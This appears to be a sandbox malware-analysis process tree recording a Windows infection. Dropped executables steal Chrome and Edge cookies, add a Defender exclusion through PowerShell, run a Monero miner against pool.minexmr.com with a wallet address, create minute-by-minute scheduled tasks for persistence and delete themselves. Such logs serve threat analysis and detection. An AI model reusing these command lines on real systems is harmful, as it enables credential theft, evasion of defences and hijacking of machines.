C:\Users\Admin\Documents\uUF0atfnNdd21kTnNYUAhIyj.exe"C:\Users\Admin\Documents\uUF0atfnNdd21kTnNYUAhIyj.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4320 -s 15523⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe"C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe" -Force3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe"C:\Users\Admin\Documents\B0B4AHrsgxA7Nt6vDYP9D9LZ.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\winsetupcom.exe"C:\Users\Admin\AppData\Local\Temp\winsetupcom.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.minexmr.com:4444 -u 44iQQ1yP3JMbnSdzoY3GzYUUfESrEGEfKakyhxt1FqjfcktWxXkhaGjEs96Y7jJfnEeHa37h4Cjf6cQgA8GzAaGnGPGgkxR -p x -k -v=0 --donate-level=1 -t 15⤵
-
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.minexmr.com:4444 -u 44iQQ1yP3JMbnSdzoY3GzYUUfESrEGEfKakyhxt1FqjfcktWxXkhaGjEs96Y7jJfnEeHa37h4Cjf6cQgA8GzAaGnGPGgkxR -p x -k -v=0 --donate-level=1 -t 15⤵
-
C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\b79de8f8-c625-4e13-81cf-f519955346b0\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\FOlaPszW2GVODMR3ezIbHQJx.exe"C:\Users\Admin\Documents\FOlaPszW2GVODMR3ezIbHQJx.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpE7A6_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpE7A6_tmp.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Ogni.cab4⤵
-
C:\Windows\SysWOW64\cmd.execmd5⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^kFkkCweteokIGxUGjOtmnesFfoGwECEIbjuYaFuyaLppmuaDjBQwmHGogFWzxwmADClxhWhHHYuNSiuoQrPrLC$" Mette.cab6⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comSapete.exe.com L6⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L9⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L10⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L11⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L12⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L13⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L14⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L15⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L16⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L17⤵
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L18⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L19⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L20⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L21⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L22⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L23⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L24⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L25⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L26⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L27⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L28⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L29⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L31⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L33⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L36⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L37⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L38⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L39⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L40⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L41⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L42⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L43⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L44⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L45⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L46⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L47⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L48⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L49⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L50⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L51⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L52⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L53⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L54⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L55⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L56⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L57⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L58⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L59⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L60⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L61⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L62⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L63⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L64⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L65⤵
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 306⤵
- Runs ping.exe
-
C:\Users\Admin\Documents\piASTjGis5c5nGd58zBj9dtn.exe"C:\Users\Admin\Documents\piASTjGis5c5nGd58zBj9dtn.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\27kSZAfpnLjWG5bu37BpjxfH.exe"C:\Users\Admin\Documents\27kSZAfpnLjWG5bu37BpjxfH.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1761590.exe"C:\Users\Admin\AppData\Roaming\1761590.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5844 -s 24644⤵
- Program crash
-
C:\Users\Admin\AppData\Roaming\6202460.exe"C:\Users\Admin\AppData\Roaming\6202460.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\jPLO2J1s8JxaX_4Pr3O7UENC.exe"C:\Users\Admin\Documents\jPLO2J1s8JxaX_4Pr3O7UENC.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\IgbKRtaNjqRQpLw8QuOXvnvo.exe"C:\Users\Admin\Documents\IgbKRtaNjqRQpLw8QuOXvnvo.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\IgbKRtaNjqRQpLw8QuOXvnvo.exe"C:\Users\Admin\Documents\IgbKRtaNjqRQpLw8QuOXvnvo.exe"3⤵
-
C:\Users\Admin\Documents\XIx2rmM8cnakuvCSq1U4Vd9g.exe"C:\Users\Admin\Documents\XIx2rmM8cnakuvCSq1U4Vd9g.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\rz4AiugRidB8wYjvgfxacrAz.exe"C:\Users\Admin\Documents\rz4AiugRidB8wYjvgfxacrAz.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 9003⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\Documents\ay5bW_VFzsOfZRDXJ5WpBM3j.exe"C:\Users\Admin\Documents\ay5bW_VFzsOfZRDXJ5WpBM3j.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
-
C:\Users\Admin\Documents\ExynYnCJF8bxFManXGVWUTlU.exe"C:\Users\Admin\Documents\ExynYnCJF8bxFManXGVWUTlU.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\DJCJOECZVtp5ltvQQsObO2H9.exe"C:\Users\Admin\Documents\DJCJOECZVtp5ltvQQsObO2H9.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\24EijN8ARjd6ySPoevmYqMMj.exe"C:\Users\Admin\Documents\24EijN8ARjd6ySPoevmYqMMj.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 11243⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 11283⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 11803⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 12403⤵
- Executes dropped EXE
- Program crash
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "24EijN8ARjd6ySPoevmYqMMj.exe" /f & erase "C:\Users\Admin\Documents\24EijN8ARjd6ySPoevmYqMMj.exe" & exit3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "24EijN8ARjd6ySPoevmYqMMj.exe" /f4⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\E6GanK2kLUrxGIsqkEGCRlzq.exe"C:\Users\Admin\Documents\E6GanK2kLUrxGIsqkEGCRlzq.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\1VdiHrPxB6a9VE3w3CWHv7XU.exe"C:\Users\Admin\Documents\1VdiHrPxB6a9VE3w3CWHv7XU.exe"2⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exeC:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exe --Task2⤵
-
C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exeC:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exe --Task3⤵
-
C:\Users\Admin\AppData\Roaming\guduedvC:\Users\Admin\AppData\Roaming\guduedv2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵
-
C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exeC:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exe --Task2⤵
-
C:\Users\Admin\AppData\Roaming\guduedvC:\Users\Admin\AppData\Roaming\guduedv2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe2⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe2⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"3⤵
- Creates scheduled task(s)
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4008.13.1581639751\1355751976" -childID 2 -isForBrowser -prefsHandle 3108 -prefMapHandle 3104 -prefsLen 7419 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4008 "\\.\pipe\gecko-crash-server-pipe.4008" 3084 tab1⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 6601⤵
- Program crash
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 6961⤵
- Program crash
-
C:\Users\Admin\Documents\E6GanK2kLUrxGIsqkEGCRlzq.exe"C:\Users\Admin\Documents\E6GanK2kLUrxGIsqkEGCRlzq.exe" -q1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\EXYNYN~1.TMP,S C:\Users\Admin\DOCUME~1\EXYNYN~1.EXE1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\EXYNYN~1.TMP,imAqMzRY2⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
- Modifies system certificate store
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318013⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp87E9.tmp.ps1"3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpE20E.tmp.ps1"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\nslookup.exe"C:\Windows\system32\nslookup.exe" -type=any localhost4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /End /tn \Microsoft\Windows\Wininet\CacheTask3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask3⤵
- Suspicious use of SetThreadContext
-
